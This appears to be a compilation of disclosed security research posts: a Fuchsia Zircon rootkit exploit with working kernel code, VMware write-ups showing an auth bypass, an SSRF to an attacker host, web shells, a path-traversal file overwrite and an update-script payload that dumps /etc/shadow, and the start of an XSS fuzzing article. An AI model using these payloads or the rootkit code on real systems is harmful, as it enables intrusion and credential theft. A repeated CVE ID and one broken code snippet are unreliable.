   0xffffffff00306fd7 <+71>:	mov    r11,QWORD PTR [r11+rax*8]
   0xffffffff00306fdb <+75>:	lfence
   0xffffffff00306fde <+78>:	jmp    r11
```

Aha, it shows that the syscall table is at 0xffffffff003c49f8. Let's see the contents:

```
(gdb) x/10xg 0xffffffff003c49f8
0xffffffff003c49f8:	0xffffffff00307040	0xffffffff00307050
0xffffffff003c4a08:	0xffffffff00307070	0xffffffff00307080
0xffffffff003c4a18:	0xffffffff00307090	0xffffffff003070b0
0xffffffff003c4a28:	0xffffffff003070d0	0xffffffff003070f0
0xffffffff003c4a38:	0xffffffff00307110	0xffffffff00307130
(gdb) disassemble 0xffffffff00307040
Dump of assembler code for function x86_syscall_call_bti_create:
   0xffffffff00307040 <+0>:	mov    r8,rcx
   0xffffffff00307043 <+3>:	mov    rcx,r10
...
```

Here the first address 0xffffffff00307040 in the syscall table points to the x86_syscall_call_bti_create() function. It is system call number zero, which is defined in the auto-generated file kernel-wrappers.inc in the gen/zircon/vdso/include/lib/syscalls/ directory. And the last syscall there is x86_syscall_call_vmo_create_physical() at 0xffffffff00307d10, which is number 175 (see ZX_SYS_COUNT defined as 176). Showing the whole syscall table plus a bit more:

```
(gdb) x/178xg 0xffffffff003c49f8
0xffffffff003c49f8:	0xffffffff00307040	0xffffffff00307050
0xffffffff003c4a08:	0xffffffff00307070	0xffffffff00307080
0xffffffff003c4a18:	0xffffffff00307090	0xffffffff003070b0
...
0xffffffff003c4f58:	0xffffffff00307ce0	0xffffffff00307cf0
0xffffffff003c4f68:	0xffffffff00307d00	0xffffffff00307d10
0xffffffff003c4f78 <_ZN6cpu_idL21kTestDataCorei5_6260UE>:	0x0300010300000300	0x0004030003030002
```

Yes, the function pointer 0xffffffff00307d10 of the last syscall is right at the end of the syscall table. That knowledge was enough for my experiments with a rootkit.

## Planting a rootkit into Zircon

As a first experiment, I overwrote the whole syscall table with 0x41 in my pwn() function. As I mentioned, this function is executed as a result of control-flow hijacking in Zircon. For overwriting the read-only syscall table, I used the old-school classic of changing the WP bit in the CR0 register:

```c
#define SYSCALL_TABLE 0xffffffff003c49f8
#define SYSCALL_COUNT 176

int pwn(void)
{
	unsigned long cr0_value = read_cr0();

	cr0_value = cr0_value & (~0x10000); // Set WP flag to 0

	write_cr0(cr0_value);

	memset((void *)SYSCALL_TABLE, 0x41, sizeof(unsigned long) * SYSCALL_COUNT);
}
```

The CR0 helpers:

```c
void write_cr0(unsigned long value)
{
	__asm__ volatile("mov %0, %%cr0" : : "r"(value));
}

unsigned long read_cr0(void)
{
	unsigned long value;
	__asm__ volatile("mov %%cr0, %0" : "=r"(value));
	return value;
}
```

The result:

```
(gdb) x/178xg 0xffffffff003c49f8
0xffffffff003c49f8:	0x4141414141414141	0x4141414141414141
0xffffffff003c4a08:	0x4141414141414141	0x4141414141414141
0xffffffff003c4a18:	0x4141414141414141	0x4141414141414141
...
0xffffffff003c4f58:	0x4141414141414141	0x4141414141414141
0xffffffff003c4f68:	0x4141414141414141	0x4141414141414141
0xffffffff003c4f78 <_ZN6cpu_idL21kTestDataCorei5_6260UE>:	0x0300010300000300	0x0004030003030002
```

Good. Then I started to think about how to hijack the Zircon syscalls. Doing that similarly to the Linux kernel rootkits was not possible: a usual Linux rootkit is a kernel module that provides hooks as functions from that particular module in the kernelspace. But in my case, I was trying to plant a rootkit from the userspace exploit into the microkernel. Implementing the rootkit hooks as userspace functions in the exploit process context could not work.

So I decided to turn some kernel code from Zircon into my rootkit hooks. My first candidate for overwriting was the assert_fail_msg() function, which drove me nuts during exploit development. That function was big enough, so I had a lot of space to place my hook payload.

I wrote my rootkit hook for the zx_process_create() syscall in C, but didn’t like the assembly of that hook generated by the compiler. So I reimplemented it in asm. Let’s look at the code, I like this part:

```c
#define XSTR(A) STR(A)
#define STR(A) #A

#define ZIRCON_ASSERT_FAIL_MSG 0xffffffff001012e0
#define HOOK_CODE_SIZE 60
#define ZIRCON_PRINTF 0xffffffff0010fa20
#define ZIRCON_X86_SYSCALL_CALL_PROCESS_CREATE 0xffffffff003077c0

void process_create_hook(void)
{
	__asm__ ( "push %rax;"
		  "push %rdi;"
		  "push %rsi;"
		  "push %rdx;"
		  "push %rcx;"
		  "push %r8;"
		  "push %r9;"
		  "push %r10;"
		  "xor %al, %al;"
		  "mov $" XSTR(ZIRCON_ASSERT_FAIL_MSG + 1 + HOOK_CODE_SIZE) ",%rdi;"
		  "mov $" XSTR(ZIRCON_PRINTF) ",%r11;"
		  "callq *%r11;"
		  "pop %r10;"
		  "pop %r9;"
		  "pop %r8;"
		  "pop %rcx;"
		  "pop %rdx;"
		  "pop %rsi;"
		  "pop %rdi;"
		  "pop %rax;"
		  "mov $" XSTR(ZIRCON_X86_SYSCALL_CALL_PROCESS_CREATE) ",%r11;"
		  "jmpq *%r11;");
}
```

1. This hook saves (pushes to the stack) all the registers that can be clobbered by the subsequent function calls.
2. Then I prepare and call the Zircon printf() kernel function:
   - The first argument of this function is provided via the rdi register. It stores the address of the string that I want to print to the kernel log. More details on this will come later. The trick with the STR and XSTR macros is used for stringizing; you can read about it in the GCC documentation.
   - Zero in al indicates that no vector arguments are passed to this function with a variable number of arguments.
   - The r11 register stores the address of the Zircon printf() function, which is called by the callq *%r11 instruction.
3. After calling the kernel printf(), the clobbered registers are restored.
4. Finally, the hook jumps to the original syscall handler zx_process_create().

And now the most interesting part: the rootkit planting. The pwn() function copies the code of the hook from the exploit binary into the Zircon kernel code, at the address of assert_fail_msg():

```c
#define ZIRCON_ASSERT_FAIL_MSG 0xffffffff001012e0
#define HOOK_CODE_OFFSET 4
#define HOOK_CODE_SIZE 60

	char *hook_addr = (char *)ZIRCON_ASSERT_FAIL_MSG;
	hook_addr[0] = 0xc3; // ret to avoid assert
	hook_addr++;
	memcpy(hook_addr, (char *)process_create_hook + HOOK_CODE_OFFSET, HOOK_CODE_SIZE);
	hook_addr += HOOK_CODE_SIZE;
	const char *pwn_msg = "ROOTKIT HOOK: syscall 102 process_create()\n";
	strncpy(hook_addr, pwn_msg, strlen(pwn_msg) + 1);

#define SYSCALL_N_PROCESS_CREATE 102
#define SYSCALL_TABLE 0xffffffff003c49f8

	unsigned long *syscall_table_item = (unsigned long *)SYSCALL_TABLE;
	syscall_table_item[SYSCALL_N_PROCESS_CREATE] = (unsigned long)ZIRCON_ASSERT_FAIL_MSG + 1; // after ret

	return 42; // don't pass the type check in DownCastDispatcher
```

1. hook_addr is initialized with the address of the assert_fail_msg() kernel function.
2. The first byte of this function is overwritten with 0xc3, which is the ret instruction. I do that to skip the Zircon crashes on assertions; now the assertion handling returns immediately.
3. The exploit copies the code of my rootkit hook for the zx_process_create() syscall into the kernelspace. I described process_create_hook() above.
4. The exploit copies the message string that I want to print on every zx_process_create() syscall. The hook will execute mov $" XSTR(ZIRCON_ASSERT_FAIL_MSG + 1 + HOOK_CODE_SIZE) ",%rdi, and the address of this string will get into rdi. Now you see why I added 1 byte to this address: it accounts for the additional ret instruction at the beginning of assert_fail_msg().
5. The address of the hook ZIRCON_ASSERT_FAIL_MSG + 1 is written to the syscall table, item number 102, which is for the zx_process_create() syscall handler.
6. Finally, the pwn() exploit function returns 42. As I mentioned, Zircon uses my fake vtable and executes this function instead of the TimerDispatcher.get_type() method. The original get_type() method of this kernel object returns 16 to pass the type check and proceed handling. And here I return 42 to fail this check and finish the zx_timer_cancel() system call, which hit use-after-free.

Ok, the rootkit is now planted into the Zircon microkernel of Fuchsia OS!

## Exploit demo

I implemented a similar rootkit hook for the zx_process_exit() syscall at the place of the assert_fail() kernel function. So the rootkit prints the messages to the kernel log upon process creation and exiting. See the exploit demo:

## Conclusion

That’s how I came across Fuchsia OS and its Zircon microkernel. This work was a refreshing experience for me. I’d wanted to try my kernel-hacking skills on this interesting OS for a long time ever since I heard about it at the Linux Security Summit 2018 in Vancouver. So I’m glad of this research.

In this article, I gave an overview of the Fuchsia operating system, its security architecture, and the kernel development workflow. I assessed it from the attacker’s perspective and shared the results of my exploit development experiments for the Zircon microkernel. I followed the responsible disclosure process for the Fuchsia security issues discovered during this research.

This is one of the first pieces of public research on Fuchsia OS security. I believe this article will be useful for the OS security community, since it spotlights practical aspects of microkernel vulnerability exploitation and defense. I hope my work inspires you to do some kernel hacking too. Thanks for reading!

# Catching bugs in VMware: Carbon Black Cloud Workload Appliance and vRealize Operations Manager

25 February 2022 at 11:23

Last year we found a lot of exciting vulnerabilities in VMware products. The vendor was notified and they have since been patched. This is the second part of our research. This article covers an Authentication Bypass in VMware Carbon Black Cloud Workload Appliance (CVE-2021-21978) and an exploit chain in VMware vRealize Operations (CVE-2021-21975, CVE-2021-22023, CVE-2021-21983) which led to Remote Code Execution.

## VMware Carbon Black Cloud Workload Appliance

Our story begins with a vulnerability in the VMware Carbon Black Cloud Workload Appliance, where we managed to bypass the authentication mechanism and gain access to the administrative console.

The appliance is hosted on-premises and is the link between an organization's infrastructure and VMware Carbon Black Cloud, which is an endpoint protection platform.

By checking the ports listening on 0.0.0.0 using the netstat command, we found a web application on port 443.

The front-end server was an Envoy proxy server. Upon looking into its configuration file, we determined that further requests are proxied to tomcat-based microservices.

Excerpt from config /opt/vmware/cwp/appliance-gateway/conf/cwp-appliance-gateway.yaml:

node:
  cluster: cwp_appliance
  id: cwp-appliance-v1-2020
static_resources:
  clusters:
    - connect_timeout: 5s
      hosts:
        - port_value: 3030
      lb_policy: round_robin
      name: service_vsw
      type: LOGICAL_DNS
    - connect_timeout: 5s
      hosts:
        - port_value: 3020
      lb_policy: round_robin
      name: service_apw
      type: LOGICAL_DNS
    - connect_timeout: 5s
      hosts:
        - port_value: 3010
      lb_policy: round_robin
      name: service_acs
      type: LOGICAL_DNS


After studying the application.yml configuration file for the service, which is called service_acs and runs on port 3010, we found that a role-based access model from the Java Spring framework is implemented.

// application.yml
rbacpolicy:
  role:
    - name: SERVICE_USER
      default: DENY
      permissions:
        - '*:*'

    - name: APPLIANCE_USER
      default: DENY
      permissions:
        - 'acs:getToken'
        - 'acs:getServiceToken'
        - 'apw:getApplianceDetails'
        - 'apw:getApplianceSettings'
        - 'apw:getNetworkConf'
…

A cursory examination of the role policy raises many questions:

• What is a service user?
• Why does it have unlimited capabilities?
• What does the getServiceToken API method do?

We decided to start by exploring the getServiceToken API method. Opening the source code, we studied the description of this method: "Generate JWT Token for Service Request". That is, every time the application needs authentication for an internal API method call, it accesses this API and receives an authorization token.

An excerpt from TokenGeneratorApi.java:

@ApiOperation(
    value = "Generate JWT Token for Service Request",
    nickname = "getServiceToken",
    notes = "",
    response = AccessTokenDTO.class,
    tags = {"TokenGenerator"}
)
@ApiResponses({@ApiResponse(
    code = 200,
    message = "OK",
    response = AccessTokenDTO.class
…
@RequestMapping(
    value = {"/api/v1/service-token/{serviceName}"},
    produces = {"application/json"},
    method = {RequestMethod.GET}
)
ResponseEntity<AccessTokenDTO> getServiceToken(@ApiParam(value = "name of the service which is requesting token", required = true) @PathVariable("serviceName") String serviceName);


Let’s try to get the authorization token by accessing the service that is attached to port 3010 from the internal network.

We got a JWT token, which turns out to be for the role of our old friend, the service user.

Decoding of the JWT token payload:

{
  "sub": "any-service",
  "iss": "user-service",
  "nbf": 1645303446,
  "exp": 1731703446,
  "policy": {
    "role": "SERVICE_USER",
    "permissions": {
      "*": [
        "*"
      ]
    }
  },
  "refreshable": false,
  "iat": 1645303446
}


The prospect of being able to generate a token for a super-user without authentication looks very tempting. Let’s try to do the same trick, but this time externally, through the Envoy server.

We failed, although the other API methods of the Java service were available to us. Let’s see how proxying to internal services is organized and study the mechanisms that are responsible for routing.

When using the Envoy proxy server as a front-end server, the routing table can be generated dynamically using the Route Discovery API. To do this, the backend service describes the route configuration using DiscoveryRequest and other entities from the io.envoyproxy.envoy.api package.

An example of creating an /admin/ route using the Envoy API:

public String routeDiscovery(final DiscoveryRequest discoveryRequest) {
...
VirtualHost virtualHost = virtualHostOrBuilder.build();
String response = null;
...
try {
response = JsonFormat.printer().usingTypeRegistry(typeRegistry).print(discoveryResponse);
} catch (InvalidProtocolBufferException err) {
log.error("Error while serializing response", err);
}

return response;
}


Let’s consider a specific example from the Java service.

An excerpt from EnvoyXDSServiceImpl.java:

package com.vmware.cwp.appliance.applianceworker.service.impl;

@Component
public class EnvoyXDSServiceImpl implements EnvoyXDSService {
...
public String routeDiscovery(final DiscoveryRequest discoveryRequest) {
...
Route service_token_block = Route.newBuilder()
.setMatch(RouteMatch.newBuilder()
.setPrefix("/acs/api/v1/service-token").build())
.setRoute(RouteAction.newBuilder().setCluster("service_vsw")
.setPrefixRewrite("/no_cloud").build()).build();

...
Route acs = Route.newBuilder()
.setMatch(RouteMatch.newBuilder()
.setPrefix("/acs/").build())
.setRoute(RouteAction.newBuilder()
.setCluster("service_acs")
...


We see that when the URL /acs/api/v1/service-token is encountered, the application forwards the request to a stub page instead of passing it on to the service for processing. At the same time, any URL prefixed with /acs/ will be forwarded to the backend. Our task is to bypass the blacklist while still satisfying the whitelist condition. A peculiarity of the Envoy server allows us to do exactly that. Reading the documentation, we found one interesting point: the Envoy server has path normalization disabled by default.

Despite the Envoy developers' recommendation to enable this property when working with RBAC filters, the default value often remains unchanged, as it did here. With normalization disabled, Envoy treats the URLs /acs/api/v1/service-token/rand and /acs/api/v1/%73ervice-token/rand as non-identical strings, although after normalization by another server, such as Tomcat, the URLs are treated as identical again.

It turns out that if we change at least one character in the API-method name to its URL representation, we can bypass the blacklist without violating the whitelist conditions.
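A few lines of Python illustrate the mismatch, using the prefixes from the route configuration above:

```python
from urllib.parse import unquote

BLACKLIST_PREFIX = "/acs/api/v1/service-token"
WHITELIST_PREFIX = "/acs/"

# "s" replaced with its percent-encoded form %73
path = "/acs/api/v1/%73ervice-token/any-service"

# Envoy (normalization disabled) matches prefixes against the raw path:
assert not path.startswith(BLACKLIST_PREFIX)  # blacklist route never fires
assert path.startswith(WHITELIST_PREFIX)      # whitelist route still matches

# Tomcat decodes the path before dispatching, so the backend sees:
print(unquote(path))  # /acs/api/v1/service-token/any-service
```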

We send a modified request and receive a service token.

Done. We now have a service token with super-user privileges, which grants us administrator powers over this software.

## VMware vRealize Operations Manager

In the next story we will tell you about the chain of vulnerabilities found in automation software.

### Server-Side Request Forgery

We started by investigating the Operations Manager API and found a couple of methods available without authentication. These included the API method /casa/nodes/thumbprints, which takes an address as a user parameter. By specifying the address of a remote server under our control as the parameter in the HTTP request, we receive a GET request from the Operations Manager instance with the URL path /casa/node/thumbprint.

To control the URL path completely, we can add the "?" symbol to cut off the path that the application normally concatenates. Let's send a request with a custom path:

As a result, we were able to make any GET request on behalf of the application, including to internal resources.
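The effect of the appended "?" is easy to verify (attacker.example stands in for our server):

```python
from urllib.parse import urlsplit

# The application appends its own path to the user-supplied address;
# a trailing "?" turns that appended path into a harmless query string
user_address = "http://attacker.example/steal?"
url = urlsplit(user_address + "/casa/node/thumbprint")

print(url.path)   # /steal
print(url.query)  # /casa/node/thumbprint
```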

Having been able to make GET requests to internal resources, we tried calling API methods that are available only to an authorized user. For example, we got access to the API method for synchronizing passwords between nodes. Calling this method returns the administrator's password hash under two different hashing algorithms, sha256 and sha512.

It is worth saying that the SHA family of algorithms is not recommended for password hashing, and such hashes can be cracked with a high chance of success. And since the administrator in the application corresponds to the system admin user on the server, if the system runs an SSH server that does not require keys, you can connect to the server and gain access to a command shell. To store sensitive data such as passwords, best practice is to use so-called slow hash functions.
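The difference can be sketched in Python: a plain SHA-256 digest costs microseconds per guess, while a memory-hard KDF such as scrypt (one possible choice of slow hash) makes every guess expensive:

```python
import hashlib
import os

password = b"S3cret!"
salt = os.urandom(16)

# Fast hash: a GPU rig can try billions of these per second
fast = hashlib.sha256(salt + password).hexdigest()

# Slow, memory-hard KDF: each guess costs ~16 MiB of RAM and real CPU time
slow = hashlib.scrypt(password, salt=salt, n=2**14, r=8, p=1)
```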

### Credentials Leak

Despite the high probability of gaining shell access at this stage, the above method is not fully guaranteed, so we continued our research. It is worth noting how, using SSRF, we gained access to API methods that require authentication. Several mechanisms could provide this functionality, and in this case not the best one was chosen: every time the application accesses the API, it adds a basic authentication header to the request. To extract the credentials from the header, we sent an SSRF request to our remote sniffer, which outputs the contents of the HTTP request in response:

It appears that the application uses the maintenanceAdmin user to access the API. Let’s try to use these credentials to access the protected API methods directly, without SSRF.

Well, now that we have super-user privileges, we’re only one step from taking control of the server. After looking through all the API methods, we found two ways to access the shell.

The first, rough approach involves resetting the password of the administrative user with the PUT /casa/os/slice/user API method. This method changes a user's password without additional verification, such as asking for the current password. Since a system user of the same name, admin, exists, it is easy to connect to the system under that account via SSH.

If SSH is disabled, simply enable it using one of the API methods.

### RCE (Path Traversal)

The previous approach involved resetting the administrator password, which can disrupt the customer's workflow during a pentest. As an alternative, we found a way to upload a web shell via a path traversal attack on the /casa/private/config/slice/ha/certificate API method. A lightweight JSP shell uploaded to the web directory of the server serves as the web shell.

After uploading, we access the shell at https://vROps.host/casa/webshell.jsp, passing the command in the cmd parameter.

## Outro

Thank you for reading this article to the end. We hope you found something useful in our research, whether you are a developer, a researcher, or maybe even the head of a PSIRT.

We would also like to highlight that this research resulted in 9 CVEs of varying severity, and each report was handled with the utmost care by the VMware Security Response Center team. We thank VMware for this cooperation.

# Hunting for bugs in VMware: View Planner and vRealize Business for Cloud

15 February 2022 at 14:06

Last year we found a lot of exciting vulnerabilities in VMware products. They were responsibly disclosed to the vendor and have been patched. This will be a couple of articles disclosing the details of the most critical flaws. This article covers unauthenticated RCEs in VMware View Planner (CVE-2021-21978) and in VMware vRealize Business for Cloud (CVE-2021-21984).

We want to thank VMware and their security response center for the responsible cooperation. During our collaboration and communication, we saw that the main goal of their approach is to take care of their customers and users.

## VMware View Planner

VMware View Planner is the first comprehensive standard methodology for comparing virtual desktop deployment platforms. Using the patented technology, View Planner generates a realistic measure of client-side desktop performance for all desktops being measured on the virtual desktop platform. View Planner uses a rich set of commonly used applications as the desktop workload.

VMware View Planner Documentation

After deploying this system, users access the web management interface at ports 80 and 443.

We started our investigation by using the netstat -pltn command to identify the process bound to port 443/TCP. As shown below, this turned out to be the docker process:

To get a list of all the docker containers and the ports each one forwarded to the host machine we ran the docker ps command:

Ports 80 and 443 were forwarded from the appacheServer container. Next, we got a shell inside the container to find out exactly which application handles the HTTP requests. As shown below, this turned out to be the httpd server:

The configuration file of the httpd server, httpd.conf, was located in the directory /etc/httpd/conf/. An extract of the configuration file is shown below:

<Directory "/etc/httpd/cgi-bin">
AllowOverride None
Options None
Require all granted
</Directory>

# WSGI configuration for log uplaod

#
# Avoid passing HTTP_PROXY environment to CGI's on this or any proxied
# backend servers which have lingering "httpoxy" defects.
# 'Proxy' request header is undefined by the IETF, not listed by IANA
#
</IfModule>

The line with the WSGIScriptAlias directive caught our attention. That directive points to the Python script log_upload_wsgi.py, which is responsible for handling requests to the /logupload URL. Significantly, no authentication is required to make this request.

We determined:

1. VMware View Planner handles a request to the /logupload URL made to the 443/TCP port.
2. The request is redirected from the host into the appacheServer docker container.
3. The Apache HTTP Server service (httpd) handles requests to the mentioned URL inside the container by executing the log_upload_wsgi.py Python script.

We immediately started analyzing the log_upload_wsgi.py script. The script is small and lightweight. A summary of its functions:

1. The script handles HTTP POST requests.
2. The script parses data from the request.
3. The script creates a file with a pathname built from the unsanitized data in the request and a static prefix.
4. Finally, the script writes the POST content into that file.
#...
if environ['REQUEST_METHOD'] == 'POST':
    #...
    resultBasePath = "/etc/httpd/html/vpresults"
    try:
        filedata = post["logfile"]

        if not os.path.exists(os.path.join(resultBasePath, logFileJson.itrLogPath)):
            os.makedirs(os.path.join(resultBasePath, logFileJson.itrLogPath))

        if filedata.file:
            filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, logFileJson.logFileType)
            with open(filePath, 'wb') as output_file:
                while True:
                    data = filedata.file.read(1024)
                    # End of file
                    if not data:
                        break
                    output_file.write(data)
#...

We were surprised that the user data wasn't filtered at all. This means we could create an arbitrary file with arbitrary content using a path traversal or an uncommon feature of the os.path.join function.

We want to draw attention to the unsafe use of the os.path.join function in some cases. Even if the user input has been sanitized and the ".." strings stripped to prevent path traversal, it is still possible to pass an absolute path to the desired directory as the second argument.
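This quirk of os.path.join is easy to demonstrate:

```python
import os.path

base = "/etc/httpd/html/vpresults"
# No ".." in sight, but the second argument is an absolute path
user_input = "/etc/httpd/html/wsgi_log_upload/log_upload_wsgi.py"

# os.path.join discards every preceding component once it
# encounters an absolute path component
print(os.path.join(base, user_input))
# → /etc/httpd/html/wsgi_log_upload/log_upload_wsgi.py
```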

Often, even when it is possible to upload a malicious file, a Python web app needs to be restarted entirely before it picks up the new code and yields remote code execution. Unfortunately for VMware, in this case the WSGIScriptAlias alias in the httpd config meant that the script is not cached: it is loaded into memory and executed each time a user requests the /logupload URL.

With this in mind, we decided to overwrite the original log_upload_wsgi.py script with our own malicious code. We had only one attempt to upload a valid Python script; otherwise, we would break the web app. We created a WSGI web shell in Python and tried to upload it to the /etc/httpd/html/wsgi_log_upload/ folder under the log_upload_wsgi.py filename.
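A WSGI web shell of this kind can be as small as the following (an illustrative sketch, not our exact payload):

```python
import subprocess
from urllib.parse import parse_qs

def application(environ, start_response):
    # Run the shell command passed in the "cmd" GET parameter
    # and return its output as the response body
    params = parse_qs(environ.get('QUERY_STRING', ''))
    cmd = params.get('cmd', ['id'])[0]
    output = subprocess.run(cmd, shell=True, capture_output=True).stdout
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [output]
```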

The attempt was successful and we uploaded the file. For the PoC, we executed the whoami command by sending an HTTP request to the /logupload path with the cmd GET parameter. The server's response revealed the current system user: apache.

## VMware vRealize Business for Cloud

VMware vRealize Business for Cloud automates cloud costing analysis, consumption metering, cloud comparison and planning, delivering the cost visibility and business insights you need to run your cloud more efficiently.

VMware vRealize Business for Cloud Documentation

The second vulnerability in this article affects software that works alongside cloud services. During the assessment, we discovered that the application update mechanism is accessible without any authentication. Exploiting this feature resulted in arbitrary code execution on the target system.

It is no secret that if an attacker gains access to software update functionality and can affect the installation process, the consequences for the system are critical. In this case, the update mechanism allowed setting up custom repositories as package sources. Although this gives the administrator more flexibility, since they can choose the package location themselves, it also makes exploitation easier for attackers.

At first, we looked closely at the script upgradeVrb.py, located in the directory /opt/vmware/share/htdocs/service/administration/ and responsible for the upgrade functionality. It turned out to be available without authentication, and it accepts the repository_url parameter.

A fragment of the vulnerable code in upgradeVrb.py:

app = Router()
repository_type = routing.get_query_parameter('repository_type')  # default, cdrom, url
# default is when no provider-runtime.xml is supplied
try:
    #...
except:
    pass

url = ''
if repository_type == 'cdrom':
    url = 'cdrom://'
elif repository_type == 'url':
    url = routing.get_query_parameter('repository_url')
    if not url:
        cgiutil.error('repository_url is needed')
elif repository_type == 'default':
    #...

After specifying the address of a remote server under our control in the repository_url parameter, we noticed in the logs that the application requested the manifest-latest.xml file.

So, after spending a little time in the documentation, we figured out that the manifest-latest.xml file plays the central role in a repository. A custom repository consists of packages, additional resources, and the manifest. The manifest file is the core component of each repository; it describes the exact steps of the update process. The repository can be located on any web server as a set of files and folders, but it must meet the specification.

As the next step, we found an example of a correct manifest file for this software.

<?xml version="1.0"?>
<update>
<version>7.6.0.28529</version>
<fullVersion>7.6.0.28529 Build 13134973</fullVersion>
<vendor>VMware</vendor>
<vendorUUID>706ee0c0-b51c-11de-8a39-0800200c9a66</vendorUUID>
<productRID>a1ba78af-ec67-4333-8e25-a4be022f97c7</productRID>
<vendorURL/>
<productURL/>
<supportURL/>
<releaseDate>20190403115019.000000+000</releaseDate>
<EULAList showPolicy="" introducedVersion=""/>
<UpdateInfoList>
<UpdateInfo introduced-version="7.8" category="feature" severity="important" affected-versions="" description="" reference-type="vendor" reference-id="" reference-url=""/>
</UpdateInfoList>
<preInstallScript>
#!/bin/sh
exit 0
</preInstallScript>
<postInstallScript>
#!/bin/sh
exit 0
</postInstallScript>
<Network protocols="IPv4,IPv6"/>
</update>


While examining the manifest file, the document elements called preInstallScript and postInstallScript caught our attention:

<preInstallScript>
#!/bin/sh
exit 0
</preInstallScript>
<postInstallScript>
#!/bin/sh
exit 0
</postInstallScript>

The content of these elements hints that they hold the OS commands executed before and after the update: the perfect place to inject malicious code.

The updating procedure consists of three steps:

1. Setting up the location of the remote repository
2. Version comparison between the installed version and the version in the repository
3. Remote installation procedure

We changed the version number in our repository and added the payload, a cat /etc/shadow > /opt/vmware/share/htdocs/shadow command, so that the sensitive file would be written to a publicly available directory:

<?xml version="1.0"?>
<update>
<version>7.8.4.28529</version>
<fullVersion>7.8.4.28529 Build 13134973</fullVersion>
<vendor>VMware</vendor>
….
<preInstallScript>
#!/bin/sh
exit 0
</preInstallScript>
<postInstallScript>
#!/bin/sh
cat /etc/shadow > /opt/vmware/share/htdocs/shadow
exit 0
</postInstallScript>
<Network protocols="IPv4,IPv6"/>
</update>


As it turned out, there are integrity checks on the system. The VMware product checks the manifest-latest.xml.sig file, which should contain the digital signature of the package. That is why our first attempt failed:

So, this attempt was unsuccessful. But a quick Internet search reveals that this step is not mandatory and can be skipped by setting the validateSignature property to False in provider-runtime.xml, which stores the repository URL. To do that, we need another trick. Let's look again at how upgradeVrb.py generates provider-runtime.xml.

elif repository_type == 'url':
    url = routing.get_query_parameter('repository_url')
    if not url:
        cgiutil.error('repository_url is needed')
elif repository_type == 'default':
    #...

if url:
    with open("/opt/vmware/var/lib/vami/update/provider/provider-runtime.xml", 'w') as provider_file:
        provider_file.write("""
<service>
    <properties>
    </properties>
</service>
""" % url)


As you can see, the repository_url parameter is taken from the user input without sanitization. That means we can inject a validateSignature XML tag via the user-controlled parameter, which disables the integrity check:
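The vulnerable pattern can be modeled in a few lines. The property layout of provider-runtime.xml is our assumption here; only the idea of breaking out of the value matters:

```python
# Minimal model of the flaw: user input written into an XML template
# without escaping (the property element syntax is assumed, not VMware's)
template = ("<service><properties>"
            "<property name='url' value='%s'/>"
            "</properties></service>")

# Close the value early and smuggle in an extra property
repository_url = ("http://attacker.example/repo'/>"
                  "<property name='validateSignature' value='False'/><x q='")

print(template % repository_url)
```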

With the integrity check disabled, we attempted our attack again using the update process.

The abuse of the update functionality was successful, and we were able to get a copy of the /etc/shadow file from the web directory without any authentication:

## To be continued

Don’t worry, it’s not over yet. In the next article, we will talk about the SSRF to RCE vulnerability chain and a misconfiguration in a fancy proxy server that led to a severe consequence. Stay tuned!

# Fuzzing for XSS via nested parsers condition

29 December 2021 at 13:58

When communicating online, we constantly use emoticons and put text in bold. Some of us encounter markdown on Telegram or GitHub, while forum-dwellers might be more familiar with BBCode.

All this is made possible by parsers, which find a special string (code/tag/character) in messages and convert it into beautiful text using HTML. And as we know, wherever there is HTML, there can be XSS.

This article reveals our novel technique for finding sanitization issues that could lead to XSS attacks. We show how to fuzz and detect issues in HTML parsers with nested conditions. This technique allowed us to find a bunch of vulnerabilities in popular products that no one had noticed before.

The technique was presented at Power Of Community 2021.

## Parsers

### What are parsers, and what are they for in messages?

Parsers are applications that find substrings in a text. When parsing messages, they find a special substring and convert it into the corresponding HTML code.

## Well known parsers in messages

### HTML as message markup

Some well-known applications allow whitelisted HTML tags like <b>, <u>, <img> (WordPress, Vanilla Forums, etc.). It is very easy for developers without a hacker's mentality to overlook some possibilities while sanitizing these tags. That is why we think allowing even a limited list of tags is one of the worst choices a developer can make.

### BBcode

BBCode is a lightweight markup language used to format messages in many Internet forums, first introduced in 1998. Here are a few examples of BBCode and the corresponding HTML code:

### Markdown

Markdown is a lightweight markup language for creating formatted text using a plain-text editor. It was first introduced in 2004. A few other examples:

### AsciiDoc

AsciiDoc is a human-readable document format semantically equivalent to DocBook XML but uses plain-text markup conventions introduced in 2002:

### reStructuredText

reStructuredText (RST, ReST, or reST) is a file format for textual data used primarily in the Python programming language community for technical documentation. First introduced in 2002:

### Other well-known parsers

In addition to text markup parsers in messages and comments, you can also find URL and email parsers, and smart URL parsers that understand and transform into HTML not only HTTP links but also images or YouTube links. There are also emoticons and emojis that turn from text into pictures, and links to user profiles and hashtags that become clickable:

## What do we know about bugs in this functionality?

If you google “markdown XSS”, you will find examples with missing sanitization of HTML characters and URL schemes. Let’s start with them.

### Missing HTML characters sanitization

This vulnerability arises when a parser converts user input to HTML and at the same time does not sanitize HTML characters. It affects characters such as angle brackets < (0x3c), which open new HTML tags, and quotes " (0x22), ' (0x27), which mark the beginning and end of an HTML attribute value:

### Missing “javascript:” URL scheme sanitization

This vulnerability can be exploited when a parser converts user input that contains URLs. If such parsers do not sanitize the “javascript:” URL scheme, it will allow the attacker to execute arbitrary JavaScript and perform XSS attacks:

### Missing “file:” URL scheme sanitization

This is another vulnerability that occurs when a parser converts user input containing URLs. This time the cause is insufficient "file://" URL scheme sanitization. This vulnerability can lead to critical attacks against desktop applications: for example, arbitrary client-side file reading using JavaScript, arbitrary client-side file execution using plain HTML, or leakage of NTLM hashes that can be used for pass-the-hash or offline password brute-force attacks against Windows users:

### Decoding after sanitization

This vulnerability occurs when a parser converts user input to HTML and sanitizes HTML characters, but afterwards decodes the user input from a known encoding. HTML-related encodings include urlencoding (" as %22) and HTML entity transformations (" as &quot;, &#x22;, or &#34;).
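A minimal Python model of this bug class, sanitize first, decode afterwards:

```python
import html
from urllib.parse import unquote

def render(comment):
    # Bug: HTML characters are escaped first...
    sanitized = html.escape(comment)
    # ...but the input is urldecoded afterwards, undoing the protection
    return unquote(sanitized)

print(render('%3Cimg src=x onerror=alert(1)%3E'))
# → <img src=x onerror=alert(1)>
```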

## Parsers with nested conditions

A nested condition is when one payload is processed by two different parsers, which, with some manipulation, allows us to inject arbitrary JavaScript into the page. These vulnerabilities are very easy to overlook, both for developers and for hackers.

However, this type of bug is easy to find by fuzzing!

Here is a PHP code sample of a vulnerable application:

<?php
function returnCLickable($input) {
